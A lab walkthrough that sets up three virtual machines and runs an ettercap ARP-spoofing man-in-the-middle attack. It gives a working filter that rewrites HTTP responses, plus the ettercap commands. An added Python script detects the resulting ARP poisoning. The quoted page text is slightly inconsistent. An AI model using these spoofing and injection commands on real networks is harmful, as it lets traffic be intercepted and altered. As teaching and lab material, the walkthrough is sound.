Friday, December 27, 2019

ettercap http replace man-in-the-middle full example

create 3 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
       will be hosting the website the victim wants to access
3.) windows VICTIM
       will be the victim trying to access the web server


steps
-------
1.) for all 3 vms, set the virtualbox Network tab to use "Internal Network" with the same network name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER with an ip address in the same range as windows
       ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER with an ip address in the same range as windows
       ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) from each virtual machine, ping the other two systems to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
      then launch python simple http server on port 8001
             python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
       http://169.254.18.2:8001/
     you will see the text
        "this is fun"

             

9.) on kali linux ATTACKER
      create an ettercap filter file with a text editor with this content and save as "fun.filter"
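          # only look at tcp traffic to or from the web server port
          if (ip.proto == TCP) {
            if (tcp.dst == 8001 || tcp.src == 8001) {
              # request side: rename the header so the server does not compress the response
              if (search(DATA.data, "Accept-Encoding")) {
                replace("Accept-Encoding", "Accept-Nothing!");
                msg("removed encoding");
              }
              # response side: swap the word in the clear text html
              if (search(DATA.data, "fun")) {
                replace("fun", "evil");
                msg("fun is now evil");
              }
            }
          }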
   
     NOTE: the Accept-Encoding replacement above is important; otherwise the html is gzip encoded and not clear text, so your replace won't work. matching on both the src and dst port is important so you catch both the request and the response

     next compile the filter
         etterfilter fun.filter -o fun.ef
     next run ettercap using the filter and arp spoofing
         ettercap -Tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
       reload the website
         http://169.254.18.2:8001/
       you will now see the text
         "this is evil"




11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
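
While the arp poisoning from step 9 is active, it is visible in the VICTIM's arp table: the WEB SERVER's ip resolves to the ATTACKER's mac. The script below is an added example, not part of the original post; it parses `arp -a` (windows) or `ip neigh` (linux) output and flags that symptom. The sample tables and mac addresses in it are constructed for this lab's ip addresses.

```python
import re
from collections import defaultdict

# An IPv4 address at the start of a row, then a MAC later on the same line.
# Covers Windows "arp -a" rows and Linux "ip neigh" rows.
ROW = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\b.*?"
                 r"\b((?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})\b", re.I)
IGNORED = {"ff:ff:ff:ff:ff:ff"}  # broadcast entries legitimately repeat


def parse_neighbors(text):
    """Return {ip: mac} from 'arp -a' (Windows) or 'ip neigh' (Linux) output."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            mac = m.group(2).lower().replace("-", ":")
            # skip broadcast and IPv4 multicast (01:00:5e) entries
            if mac not in IGNORED and not mac.startswith("01:00:5e"):
                table[m.group(1)] = mac
    return table


def shared_macs(table):
    """MACs answering for more than one IP: the usual arp poisoning symptom."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_bindings(baseline, current):
    """IPs whose MAC differs from a baseline captured before the test."""
    return {ip: (baseline[ip], mac) for ip, mac in current.items()
            if ip in baseline and baseline[ip] != mac}


# Constructed "arp -a" output from the VICTIM; the MAC addresses are made up.
BEFORE = """\
Interface: 169.254.18.1 --- 0x4
  Internet Address      Physical Address      Type
  169.254.18.2          08-00-27-aa-bb-02     dynamic
  169.254.18.3          08-00-27-aa-bb-03     dynamic
  169.254.255.255       ff-ff-ff-ff-ff-ff     static
"""
# Same table while poisoned: the WEB SERVER ip now carries the ATTACKER mac.
DURING = BEFORE.replace("08-00-27-aa-bb-02", "08-00-27-aa-bb-03")

if __name__ == "__main__":
    base, now = parse_neighbors(BEFORE), parse_neighbors(DURING)
    print("shared macs:", shared_macs(now))
    print("changed bindings:", changed_bindings(base, now))
```

To use it on real data, save the output of `arp -a` on the VICTIM before step 9 and again during step 10, and pass both to `parse_neighbors`.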
